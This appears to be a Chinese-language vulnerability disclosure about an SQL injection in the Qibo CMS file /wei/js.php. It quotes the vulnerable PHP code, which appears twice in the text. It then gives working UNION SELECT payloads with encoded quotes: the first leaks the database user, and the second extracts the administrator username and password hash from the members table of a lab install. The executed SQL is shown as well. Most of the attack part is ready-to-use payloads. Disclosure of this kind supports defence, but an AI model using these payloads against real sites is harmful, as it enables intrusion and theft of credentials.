<ul><li>/wei/js.php</li></ul><pre class=""> elseif($type=='like') { $SQL.=" AND id!='$id' "; if(!$keyword) { extract($db->get_one("SELECT keywords AS keyword FROM {$_pre}content WHERE id='$id'")); } if($keyword){ $SQL.=" AND ( "; $keyword=urldecode($keyword); $detail=explode(" ",$keyword); unset($detail2); foreach( $detail AS $key=>$value){ $detail2[]=" BINARY title LIKE '%$value%' "; } $str=implode(" OR ",$detail2); $SQL.=" $str ) "; }else{ $SQL.=" AND 0 "; } $_INDEX=" USE INDEX ( list ) "; $ORDER=' list '; } </pre><p>Keyword由空格分割后再implode带入SQL语句,造成SQL注入。</p><p>当发送payload:</p><pre class="">f_id=4,5,6&keyword=n%%2527)UNION/**/SELECT/**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51#</pre><p>执行的SQL语句为:</p><pre class="">SELECT * FROM qb_wei_content USE INDEX ( list ) WHERE fid IN ( 4,5,6 ) AND id!='0' AND ( BINARY title LIKE...
<ul><li>/wei/js.php</li></ul><pre class=""> elseif($type=='like') { $SQL.=" AND id!='$id' "; if(!$keyword) { extract($db->get_one("SELECT keywords AS keyword FROM {$_pre}content WHERE id='$id'")); } if($keyword){ $SQL.=" AND ( "; $keyword=urldecode($keyword); $detail=explode(" ",$keyword); unset($detail2); foreach( $detail AS $key=>$value){ $detail2[]=" BINARY title LIKE '%$value%' "; } $str=implode(" OR ",$detail2); $SQL.=" $str ) "; }else{ $SQL.=" AND 0 "; } $_INDEX=" USE INDEX ( list ) "; $ORDER=' list '; } </pre><p>Keyword由空格分割后再implode带入SQL语句,造成SQL注入。</p><p>当发送payload:</p><pre class="">f_id=4,5,6&keyword=n%%2527)UNION/**/SELECT/**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51#</pre><p>执行的SQL语句为:</p><pre class="">SELECT * FROM qb_wei_content USE INDEX ( list ) WHERE fid IN ( 4,5,6 ) AND id!='0' AND ( BINARY title LIKE '%n%')UNION/**/SELECT/**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51#%' ) AND yz=1 ORDER BY list DESC LIMIT 7</pre><p>页面返回结果: </p><p><img alt="DFB28012-E968-45E0-B042-C9BEB3D84197.png" src="https://images.seebug.org/@/uploads/1434682839970-DFB28012-E968-45E0-B042-C9BEB3D84197.png" data-image-size="680,204" width="680" height="204"><br></p><p>证明漏洞存在。</p><p>发送payload:</p><pre class="">f_id=4,5,6&keyword=n%%2527)UNION/**/SELECT/**/1,(select/**/concat(username,0x3a,password)from/**/qb_members/**/limit/**/1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51#</pre><p>到:</p><pre class="">http://10.211.55.3/qibo5/wei/js.php?type=like</pre><p>得到管理员的帐号密码: </p><p><img alt="FE33D81D-4889-4517-BC40-2E219CE2E4F9.png" src="https://images.seebug.org/@/uploads/1434682879217-FE33D81D-4889-4517-BC40-2E219CE2E4F9.png" data-image-size="1584,402"><br></p>
